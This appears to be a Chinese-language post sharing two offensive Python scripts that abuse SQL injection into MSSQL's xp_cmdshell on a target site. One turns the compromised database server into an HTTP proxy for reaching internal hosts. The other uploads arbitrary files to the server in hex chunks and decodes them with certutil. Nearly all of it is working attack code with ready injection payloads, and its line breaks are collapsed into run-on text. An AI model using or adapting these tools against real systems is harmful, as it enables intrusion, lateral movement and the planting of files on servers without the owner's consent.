一个能够利用MSSQL的xp_cmdshell功能来进行流量代理的脚本，用于在站酷分离且不出网SQL注入进行代理

import base64import binasciiimport requestsfrom flask import Flask, request, make_responseimport re
regex = 'MSSQL Proxy(.+?)MSSQL Proxy'script_path = "C:/Users/MSSQLSERVER/AppData/Local/Temp/mssql_proxy.ps1"app = Flask(__name__)

def exec_xp_cmdshell(cmd):    url = 'http://10.37.129.4/sql.php'    payload = "1';DECLARE @bjxl VARCHAR(8000);SET @bjxl=0x%s;INSERT INTO sqlmapoutput(data) EXEC master..xp_cmdshell @bjxl-- ZKN" % binascii.hexlify(        cmd.encode()).decode()
    requests.post(url, data={'id': "1'; DELETE FROM sqlmapoutput-- ZKN"})    requests.post(url, data={"id": payload})
    res = requests.post(url, data={        "id": "1' UNION ALL SELECT NULL, 'MSSQL Proxy' + ISNULL(CAST(data AS NVARCHAR(4000)),CHAR(32)) + 'MSSQL Proxy',NULL FROM sqlmapoutput ORDER BY id-- ZKN"    })    return ''.join(re.findall(regex, res.text))

def send_package(ip, port, data):    cmd = "powershell {script_path} -remoteHost {ip} -port {port} -sendData {data}".format(        script_path=script_path, ip=ip, port=port, data=data    )    print(cmd)    return exec_xp_cmdshell(cmd)

def clean_up_response(response):    response = binascii.unhexlify(response.strip().encode()).decode()    headers = response.split('rnrn')[0]    body = 'rnrn'.join(response.split('rnrn')[1:]).strip()    res = make_response(body)    res.status = ' '.join(headers.split('rn')[0].split(' ')[1:])    for header in headers.split('rn')[1:]:        res.headers[header.split(':')[0]] = ':'.join(header.split(':')[1:])    return res

@app.before_requestdef before_request():    if request.method == 'CONNECT':        return    package = '{method} {path} {version}rn'.format(        method=request.method,        path=request.full_path,        version=request.environ['SERVER_PROTOCOL']    ).encode()    host = ''    for k, v in dict(request.headers).items():        if k.upper() == 'Connection'.upper():            package += b'Connection: closern'            continue        if k.upper() == 'HOST':            host = v        package += '{k}: {v}rn'.format(k=k, v=v).encode()    package += b'rn'    package += request.stream.read()    # print(package)    if not host:        return "HostNotFoundr--MSSQL Proxy"    if len(host.split(':')) > 1:        ip, port = host.split(':')    else:        ip, port = host, 80    response = send_package(ip, port, base64.b64encode(package).decode())    if response.strip() == 'FAILED':        return "Failedr--MSSQL Proxy", 902    return clean_up_response(response)

if __name__ == '__main__':    app.run(debug=True, host='0.0.0.0', port=4000)

import binasciiimport sysimport requests

def exec_xp_cmdshell(cmd):    url = 'http://10.37.129.4/sql.php'    payload = "1';DECLARE @bjxl VARCHAR(8000);SET @bjxl=0x%s;EXEC master..xp_cmdshell @bjxl-- ZKN" % binascii.hexlify(        cmd.encode()).decode()    requests.post(url, data={"id": payload})

def main():    if len(sys.argv) < 3:        print("Usage: python3 upload.py local_file_to_read remote_path_to_save")        sys.exit(1)
    cmd = '''>>"{path}" set /p="{content}"<nul'''    file = open(sys.argv[1], 'rb')    path_to_save = sys.argv[2]    exec_xp_cmdshell('cd . > "{}"'.format(path_to_save + '.tmp'))    while 1:        content = file.read(512)        payload = cmd.format(path=path_to_save + '.tmp', content=binascii.hexlify(content).decode())        exec_xp_cmdshell(payload)        if len(content) < 512:            break    exec_xp_cmdshell('certUtil -decodehex "{old_path}" "{new_path}"'.format(old_path=path_to_save + '.tmp', new_path=path_to_save))    exec_xp_cmdshell('del "{}"'.format(path_to_save + '.tmp'))    print('Uploaded successfully!')

if __name__ == '__main__':    main()